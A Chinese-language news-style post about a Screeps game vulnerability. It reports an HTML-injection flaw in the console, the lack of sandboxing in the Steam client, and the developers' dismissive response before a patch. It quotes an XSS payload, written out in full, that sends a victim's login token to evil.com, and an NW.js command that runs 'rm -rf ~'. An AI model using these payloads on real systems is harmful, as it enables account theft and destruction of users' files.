你是否曾吐槽过游戏里ai蠢得离谱?steam上收获特别好评的独立神作《screeps》干脆甩给你一张白纸:这里压根没有预设ai,每个单位的每一步移动、每一次攻击、每一句交互,全得你亲手用javascript一行行敲出来。
听起来简直是程序员的梦想照进现实——可最近一次安全事件,却让这款硬核沙盒意外沦为恶意代码的跳板。
在《Screeps》的多人服务器中,玩家可通过浏览器控制台实时查看己方或敌方单位的日志信息。但开发者为图开发便捷,竟让控制台直接执行HTML解析逻辑。后果显而易见:只要你把一个 creep 命名为 <img src=x onerror="fetch('/api/token').then(r=>r.text()).then(t=>fetch('https://evil.com/?t='+t))">,一旦对手点开你的单位详情,这段脚本就会悄然触发,将其登录Token偷传至外部服务器。
更令人脊背发凉的是,其Steam原生客户端完全未启用任何沙箱隔离机制。攻击者仅需注入一句 nw.require('child_process').exec('rm -rf ~'),即可绕过所有前端限制,在用户本地系统中执行任意命令——删文件、读密码、种后门,一气呵成。
面对如此高危漏洞,官方的回应堪称教科书级冷漠:GitHub Issues 中冷冰冰写道:“我们不视其为严重风险。”并进一步类比称,“运行你不理解的代码导致失窃,就像主动喝下不明液体中毒一样,责任在使用者自身。”
直到该问题在社交平台X上引发大规模传播,团队才在数小时内紧急推送修复补丁。然而讽刺的是,他们在官方推特与致用户邮件中仍坚称:“这从来就不属于安全漏洞”,甚至反指爆料者“蓄意抹黑”“靠制造恐慌博取流量”。
你是欣赏这种“代码即自由、风险自担”的极客哲学,还是认为放任用户裸奔于危险边缘,早已越过了开发者的基本底线?评论区等你开麦。
